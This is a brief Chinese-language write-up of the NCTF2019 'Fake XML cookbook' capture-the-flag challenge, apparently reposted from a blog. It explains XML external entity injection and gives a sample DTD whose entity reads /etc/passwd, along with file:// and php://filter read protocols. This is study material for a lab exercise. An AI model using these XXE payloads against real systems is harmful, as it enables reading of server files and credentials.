XXE漏洞 [NCTF2019]Fake XML cookbook1
2023-12-17 17:34:08
打开题目
查看源代码
发现我们post传入的数据都被放到了doLogin.php下面
访问一下看看
提示加载外部xml实体
bp抓包一下看看
得到flag
或者这样
但是很明显这样是不行的,因为资源是在admin上,也就是用户名那里
PHP引用外部实体,常见的利用协议:
file://文件绝对路径
如:
file:///etc/passwd
http://url/file.txt
php://filter/read=convert.base64-encode/resource=xxx.php
参数实体+外部实体
<!ENTITY % 实体名称 SYSTEM "URI/URL">
参数实体+外部实体
示例代码:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "file:///etc/passwd">
%file;
]>
%file
(参数实体)是在DTD中被引用的,而&file;
是在xml文档中被引用的。
?知识点源于:
文章来源:https://blog.csdn.net/m0_75178803/article/details/135045639
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。 如若内容造成侵权/违法违规/事实不符,请联系我的编程经验分享网邮箱:veading@qq.com进行投诉反馈,一经查实,立即删除!